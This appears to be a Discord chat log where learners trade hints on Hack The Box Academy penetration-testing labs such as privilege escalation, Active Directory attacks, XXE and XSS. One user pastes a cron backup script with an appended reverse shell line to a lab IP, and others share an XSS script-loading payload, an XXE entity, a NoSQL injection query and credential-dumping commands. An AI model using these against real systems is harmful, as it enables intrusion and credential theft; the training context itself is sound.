red current
#

Anyone here able to assist with the Attacking Common Applications 2nd skill assessment? I'm stuck trying to find the FQDN of the third host. I've tried every single permutation of ffuf that I can think of and I've got nothing to show for it. Does anyone have any hints on this one they can give?

vapid drum
lofty wave
vapid drum
#

🤣 this is true

#

Who knew I just needed copious amounts of sugar in the form of a vanilla shake from sonic

thorn urchin
#

idk sometimes I do better when im hungry

#

but I cant start hungry

shrewd ridge
#

Hi guys, anyone here have done with linux privesc logrotate section ?
How to exploit this ?

lyric echo
#

Hey! Is anyone able to help with the Module: HTTPs/TLS Attacks Skill assessment? I was able to re-encode the padding, and capture the Token value. Now im not sure what else I need to do to get the flag? Seems pretty confusing

glad edge
quasi wave
acoustic owl
lyric echo
#

Hey! Is anyone able to help with the Module: HTTPs/TLS Attacks Skill assessment? I was able to re-encode the padding, and capture the Token value. Now im not sure what else I need to do to get the flag? Seems pretty confusing

carmine hill
#

Just completed the blind sqli module. If someone needs help, you can dm me. (Blind SQL Injection)

acoustic owl
lyric echo
#

@acoustic owl Would you be able to provide any tips on how to get teh Token decrypted? Thanks

acoustic owl
lyric echo
rustic sage
#

Hello im in attacking common services module im in easy lab i found a user fixxx and his pass and i access to the web page but when i upload a webshell doesnt execute code!! could somebody give a hint or help?

acoustic owl
autumn pilot
#

try to execute a simple php command like echo, just to verify that php is being executed

rustic sage
#

when i execute a whoami opens a window to save the file!

misty current
spice perch
rustic sage
#

im trying to execute a simple echo hello but nothing

#

what im doing wrong?

#

got the flag!

acoustic owl
rapid sparrow
#

I stuck in this module

#

finally figure it own by chatgpt, use chmod +x monitor.sh to fix it

#

Escalate privileges and submit the root.txt flag.

vivid igloo
#

hey

#

iam kind a stuck in this module

#

idk why they are not accepting the flag

#

"GET /flag%20=%20ch3ck_th0se_gr0uP_m3mb3erSh1Ps HTTP/1.1" 404 278

#

ch3ck_th0se_gr0uP_m3mb3erSh1Ps

#

i feel lie this is the flag

forest zenith
#

Hello! How can I run a command like from my linux machine:

mssqlclient.py INLANEFREIGHT/DAMUNDSEN@172.16.5.150 -windows-auth

Being 172.16.5.150 a machine inside a AD network?

rustic sage
#

Hello, can somebody help me with the fifth question on Credential Hunting in Windows? I'm stuck and need help. The question is: "What are the credentials required to access the Edge-Router?" Thank you !! 🙂

patent blaze
#

Sups folks!
Had a hard time on Broken Auth - Skill Assessment, but managed to nail it.
If anybody needs help, just reach out!!

rustic sage
#

Hello im in attacking common services medium lab y see 6 ports 2 ftp im trying to brute force them and i have conection refused, somebody could help?

fiery berry
rustic sage
#

and if i do nmap scan seems the hosts is down

fiery berry
rustic sage
#

okay i do it

vivid igloo
#

ayo

#

i needed some hel with this Use the privileged group rights of the secaudit user to locate a flag.

#

Privileged Groups
LXC / LXD

rustic sage
#

what im doing wrong?

fiery berry
#

remove the -p

rustic sage
#

the second command is without the -p

#

i do it again

fiery berry
rustic sage
#

got it!

#

thank u!

fiery berry
#

Plus reading the man page the -p option is used to enter passive mode not to specify the port

rustic sage
#

problem with my understand of ftp got it!

fiery berry
vivid igloo
tough prawn
#

Hello guys, I am doing Active Directory Enumeration & Attack module: living off the land

i am stuck at the last question where: Utilizing techniques learned in this section, find the flag hidden in the description field of a disabled account with administrative privileges. Submit the flag as the answer.

#

I do this but it didn't work

#

dsquery * -filter "(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=2)(memberOf=CN=Administrators,CN=Builtin,DC=domain,DC=com))" -attr description

turbid tartan
#

Attacking Common Applications - Skills Assessment I: i cant find the cgi script. what wordlist should i use ?

narrow solar
#

Attacking Common Services - Easy: am i supposed to brute force mysql? everytime i do it i get blocked "[ERROR] Host '10.10.16.28' is blocked because of many connection errors; unblock with 'mysqladmin flush-hosts'"

south glen
#

hello can anyone help me with footprinting module smtp section i used the smtp-user-enum with the provide word list in the resource and still not able to get any hit

rustic sage
narrow solar
vivid igloo
#

nc -lnvp 443
nc: Permission denied

#

Connect to the target system and escalate privileges by abusing the misconfigured cron job. Submit the contents of the flag.txt file in the /root/cron_abuse directory.

#

Cron Job Abuse

#

help ?

misty current
forest zenith
vivid igloo
viscid epoch
#

Hi,

vivid igloo
#

i was wondering if i could exploit the sudo as its using Sudo version 1.8.16

#

but it didn't works

#

*work

#

#!/bin/bash
SRCDIR="/var/www/html"
DESTDIR="/dmz-backups/"
FILENAME=www-backup-$(date +%-Y%-m%-d)-$(date +%-T).tgz
tar --absolute-names --create --gzip --file=$DESTDIR$FILENAME $SRCDIR

bash -i >& /dev/tcp/10.10.14.3/443 0>&1

misty current
viscid epoch
#

This drove me nuts too, it does not make sense, but Mr GPT clarified it to me. it used php as an example not node. the issue is iterative parsing, slap these lines in to a php shell and you will see

$queryString = 'username[$ne]=1&password[$ne]=1';
parse_str($queryString, $queryArray);
print_r($queryArray);

misty current
#

Any ports lesser than 1000 ish requires sudo

vivid igloo
#

i use 8000 before

#

and yeah i also used sudo before

viscid epoch
misty current
vivid igloo
#

why am not getting the shell ?

#

nc -lnvp 1024
Listening on [0.0.0.0] (family 0, port 1024)
ls
pwd

misty current
vivid igloo
#

am i doing smth wronng here ?

#

yes

misty current
#

literally?

vivid igloo
#

that was the cronjob which was running

misty current
#

is 10.10.14.3 your VPN Tunnel IP?

vivid igloo
#

yes mam

misty current
#

Hmm, I'm kinda doubting that. can you do ip a and verify once

vivid igloo
#

yess i changed the ip and i still didn't work

#

*it

#

it took some time but the thing is am so dumb and just want everything fast i didn't knew it take some times to give a rs back but anyways i got thanks alot for the help

#

*it

misty current
#

make sure you're not just copy pasting from the section.

vivid igloo
#

being a Devops Engineer is really beneficial just deploy one application a day and do HTB all day ❤️

#

@misty current thanks alot for the help dude

raven zodiac
#

Can someone help me with the Attacking LSASS section in password attacks?

raven zodiac
#

Apply the concepts taught in this section to obtain the password to the Vendor user account on the target. Submit the clear-text password as the answer. (Format: Case sensitive)

#

im stuck with this

#

Whenever I use Pypykatz to get the creds, i just get errors

#

but nothing

misty current
#

you've dumped the LSASS right?

#

what error are you getting? you should describe that too.

raven zodiac
#

How do I dump it on parrot OS the section has screen shots from windows

brazen saffron
misty current
gaunt monolith
#

Anyone have any hint on password attack - linux pass the ticket for host svc_ workstation?

#

I found just .kt file and know john password but this is not useful to me

split steppe
#

Can anyone please tell me what's going on? I don't think ERC is working correctly?

I am trying to answer this question:

#

I do ERC --pattern o B5eB

#

It just says "command ERC registered!"

#

I get no output at all.

#

Ok figured it out, you have to switch to the log tab, to see the output of the erc command.

willow zephyr
#

Can anyone help please i am stuck on this question for about 6hours i did all things i tryed several exploits from Polkit 0.105-26 0.117-2 to authers can anyone give me clues thanks
Its question Environment Enumeration
in linux escalation of hack the box acadey

#

link to the screen shot i couldn't upload the screen shot here

runic rampart
#

Good evening friends!
DACL Attacks I: Giving Rights and Ownership
Has anyone been able to access the \DC01\CEO share without changing the CEO's password? (Did a reset-password)

thorn urchin
#

Im not positive, there may be a way to make it work but I havnt experimented enough with it in hat regard

#

I would try adding a listener in ligolo and forward 445 and such and see if that works

silent scarab
#

i am currently doing the skill assessment 1 of active directory enumeration and attacks. I've found the user (tp****) and have the nt and sha hashes, but I do not seem to be able to crack them to obtain the password 😦 could anyone please give me a clue

thorn urchin
#

who said you had to crack em

silent scarab
#

hmm well in my mind, they asked for a cleartext password. unless its stored somewhere which i wasn't looking, then it had to be cracked. so that must mean im not looking hard enough right?

thorn urchin
#

maybe

#

always a good idea to try different tools too

silent scarab
#

could i get a clue? been looking around and still no luck :/

rustic arrow
#

Module: Password Attacks
Section: Protected Files

Use the cracked password of the user Kira and log in to the host and crack the "id_rsa" SSH key. Then, submit the password for the SSH key as the answer.

Did I crack her password at any point? I can't find it in any of the notes/answers. Or should I perform a brute-force? big_think

rustic arrow
analog dock
#

You used it in “credential hunting in Linux”

rustic arrow
analog dock
#

You’re welcome👍🏼

tough kettle
#

Hey guys , Technical question
how do tools enumerate so many info out of the smb service? isn't it just for sharing files ?

placid quest
#

@tough kettle it is but that services has who uses it the version that is running alot it is not just a file share

tough kettle
#

can you explain more ? from where do they get all that info

#

does a null session on smb let you run commands on system?

ornate egret
#

hello?

#

what is this

thorn urchin
tight mesa
#

hello everyone, I'm stuck with mssql section under footprinting

#

after ran the mssqlclient.py backdoor:Password1@IPaddrSqlServer, I'm getting this error message

[*] Encryption required, switching to TLS
[-] [('SSL routines', '', 'internal error')]
#

but, if I connect thru RDP I can get in....

pastel lance
#

In the module Active Directory Enumeration & Attacks, in the section Attacking Domain Trusts - Child -> Parent Trusts - From Linux i was hoping to discuss the methodology for collecting the user bross NTLM hash. I did so || by moving a tool (rhymes with cats) on to the DC, and then using that tool to dump the hash.|| I am not sure if this is the intended path or if there is an easier way to do so via powerview or built in commandlets?

tight mesa
analog dock
#

Then fill in pass when prompted

#

What happens then?

tight mesa
#

same behavior

analog dock
#

Also if you use -windows-auth?

tight mesa
#

yep

analog dock
#

Give me a sec, I’ll spin up target and pwnbox

tight mesa
#
$ mssqlclient.py backdoor@10.129.201.248 -windows-auth 
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password:
[*] Encryption required, switching to TLS
[-] [('SSL routines', '', 'internal error')]
tight mesa
analog dock
#

No issues for me

tight mesa
#

hmm I'm running the command directly from my host, lemme try it from the pwnbox as well

#

but, ty btw

analog dock
#

You’re welcome👍🏼

#

I tried it on my kali vm as well, also without issues

tropic ledge
charred linden
#

Hello !
Anyone available to help me with a problem in the Server Side attacks module

#

Im having trouble curling the response for the 1st challenge

#

Ive followed the instructions to a Tee multiple times and im still not getting it

#

Somethings definetely wrong with their intructions

rustic sage
#

Hey! I'm doing the Windows section of the Setting Up module and I created my Windows VM, after fixing some hiccups of the display not acting correctly, I niw can't get Ubuntu to install for WSL on the VM. It's telling me to allow Virtual Machine feature, which I have or amend the BIOS. Can someone tell me what I'm missing? It's a nested VM of sorts, but the tutorial in the section doesn't say there might be any complications.

zinc marsh
#

Is there any command to url encode all?

#

am using urlencode but it doesnt encode the strings

magic dune
#

Can i use my own vm to do acadmey htb modules like the practice or exercisies? Cause I am only allowed one Pwnbox spawn a day and i want to do the exercises

analog dock
#

The answer was not to you😅

#

Im not at your module yet, so can’t help you. Sorry

zinc marsh
acoustic owl
whole grotto
#

I everybody can someone help me in the module password attack/ Hunting linux ?

misty current
#

your first for loop produces a set of hashes alright

#

but where are you curling?

#

what action does download.php?contract=./hashes.list do?

hoary perch
#

does anyone know a machine name for easy wordpress ? and could help me please

acoustic owl
acoustic owl
whole grotto
#

i found a password for smb with the password.list but it didn't work, then i mutate the password of Kira and i found another password, but it didn't work also

limber river
whole grotto
whole grotto
acoustic owl
whole grotto
#

ohhh

whole grotto
whole grotto
acoustic owl
whole grotto
#

really

autumn pilot
#

also have you checked the hint?

whole grotto
whole grotto
autumn pilot
#

if you have generated the mutation and rule correctly, then you will have the password needed

#

getting the password is quite fast

whole grotto
#

i used the custom.rule for the password in the hint, that's correct ?

autumn pilot
#

seems like so

whole grotto
#

And it doesn't work 🙂

zinc marsh
faint hull
#

is the guys with the big mustche her?

valid field
#

fellas

#

how do i open NTUSER.DAT file for analysis

#

tried every tool on earth, no luck

whole grotto
thorn urchin
whole grotto
thorn urchin
#

yes but usernames are traditionally lowercase 😛

whole grotto
heady tusk
#

I need a little hint for Attacking Common Applications / Tomcat Discovery & Enumeration. I'm out of ideas how I could get the information to answer the second question. I don't think I have access to the tomcat-users.xml file which would answer the question. Am I supposed to just answer it using the example given in the section?

rustic sage
#

For the Flow Control module on Bash Scripting. Does anyone know how to fix the error message "*** WARNING : deprecated key derivation used.
Using -iter or -pbkdf2 would be better.
bad decrypt
4007D10C617F0000:error:1C800064:Provider routines:ossl_cipher_unpadblock:bad decrypt:../providers/implementations/ciphers/ciphercommon_block.c:124:
"

raw venture
#

Hello, Is there anyone has completed the Attacking Common Services - Easy using different way? I solved the lab via reading the local file in db. Also, able to create a web shell. But I'm curious what is the other method to solve it.

zinc marsh
#

What am i writing wrong?

#

<! DOCTYPE email [

<!ENTITY hello "inlanefreight">

]>
<root>
<name>hola</name>
<tel>+333333333</tel>
<email>&hello</email>
<message>aafdafdf</message>
</root>```
limber river
#

<? .... ?>

#

it seems wrong

rustic sage
#

Okay anything for beginners

limber river
#

just check tier 0

zinc marsh
#

the line 1 is the only that cannot be wrong

steady hawk
#

You are missing ; It should be &hello;

limber river
zinc marsh
#

and I read it with the webshell

limber river
zinc marsh
limber river
rustic sage
#

Alright

zinc marsh
zinc marsh
fallow delta
zinc marsh
#

Use either method from this section to read the flag at '/flag.php'. (You may use the CDATA method at '/index.php', or the error-based method at '/error').

#

I have tried with these headers

#

POST /flag.php HTTP/1.1

#

POST /index.php HTTP/1.1

#

for the post index.php the nright?

steady hawk
#

/submitDetails.php

zinc marsh
steady hawk
#

Just change the path to /flag.php in the XML Entity while submitting POST to submitDetails.php

zinc marsh
loud pagoda
#

Hello, I am working on the XSS lab and cannot call the php script from the site. I start the php server with php -S 0.0.0.0:8080 and can hit it locally but when I put thie payload on the vulnerable field "><script src=10.10.10.10:8080/script.js></script> The listening server wont hear anything on that port.

limber river
#

any hint

loud pagoda
#

Any ideas? its the last lab of XSS module

loud pagoda
limber river
zinc marsh
limber river
#

I got the flag lol

zinc marsh
#

I normally search for exploits with searchsploit, then if nothing I search in google/chatgpt

limber river
#

I simple google search , and I got the flag

balmy saffron
#

Hello,
I used the command to read a file from MSSQL:
EXECUTE("SELECT * FROM OPENROWSET(BULK N'Path/To/File.txt', bla bla bla
I would like to know what is the 'N' just after 'BULK'? I tried without and it worked too.

loud pagoda
fringe shell
#

Can i grab a quick nudge from someone on the AD Enumeration and Attacks Assessment Pt 2? I've identified a ****9 user that I'm supposed to get creds for, but have reached a dead end in where to look

fringe shell
tight mesa
#

sorry for the silly question but, anyone can help me with the hashcat command to brake the ipmi hash

#

the command suggested in the module fire up an error message

#

and when try with hashcat -m 7300 -a 0 ipmi.txt /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt receive this message Hashfile 'ipmi.txt' on line 1 (admin:...55e70dd725f549db26e5d0f765d67516): Token length exception No hashes loaded.

fringe shell
loud pagoda
tight mesa
#

ty @fringe shell and @loud pagoda

#

now is running

hearty root
#

hello

fringe shell
ivory tide
#

Hi guys, anyone knows if any htb academy modules have URL file attack ?

fringe shell
ivory tide
golden vortex
#

AD Enumeration & Attacks - Skills Assessment Part II .Locate a configuration file containing an MSSQL connection string. What is the password for the user listed in this file? there is no file in smb and i think their is supposed to be

fringe shell
graceful mortar
#

someone could help me with BROKEN AUTHENTICATION module - Predictable Reset Token ?

silent scarab
#

hello! I have a question on the AD Enumeration & Attacks - Skills Assessment Part II. I have managed to obtain the credentials for the user ab___. When I perform username enumeration using crackmapexec, i get various usernames of the same pattern as the one i got initially (2 letters, 3 numbers usernames). however, i tried other methods for practice, such as using Kerbrute with the jsmith.txt list. And somehow it managed to find 50 valid usernames as well, but completely different from the pattern. why does it do that? and how do we determine which tool usually has the highest accuracy when forming these lists

unreal berry
#

Hi guys, anyone wants to learn togther both paths and then for the OSCP ?

tough prawn
#

Retrieve the TGS ticket for the SAPService account. Crack the ticket offline and submit the password as your answer.

#

ACTIVE DIRECTORY ENUMERATION - > Kerberoasting - from Linux

#

where the credential for the AD User

fringe shell
silent scarab
fringe shell
silent scarab
fringe shell
tough prawn
#

i wanna to enumerate The SPNs but I don't have credential for A user AD

tough prawn
#

I got the password but Now I'm stuck on
What powerful local group on the Domain Controller is the SAPService user a member of?

fringe shell
#

anyone able to give me a hand with AD Enumeration & Attacks - Skills Assessment Part II? I'm trying to get creds for the ||CT___|| user

tough prawn
#

How can I enumerate the Group without have access inside the machine ?

languid dawn
#

all you need is to authenticate to the AD with one of its users to enumerate it

tough prawn
languid dawn
#

That's something you should try to figure out with cme docs and/or research

uneven cobalt
#

@languid dawn it's good to be here having helping mind people around

languid dawn
#

yes but searching for answers by yourself is also a good skill, and I wouldn't suggest that if it was something obscure

#

but ofc that doesn't mean that someone else can't give the answer

#

I just think that it is something they should be able to figure out by themselves

uneven cobalt
#

Yeah I will keep that in mind

heady tusk
#

I need a little hint for Attacking Common Applications / Tomcat Discovery & Enumeration. I'm out of ideas how I could get the information to answer the second question. I could guess the second question but I can't seem to figure out the intended way

naive wadi
#

did you ever get the formatting for this?

#

Need help witht the formatting of an answer: Module Shells & Payloads; Antak Webshell it is asking for a this format (Format: **, 1 space) as an answer, I have the answer but I have no idea what that format is?

pallid brook
heady tusk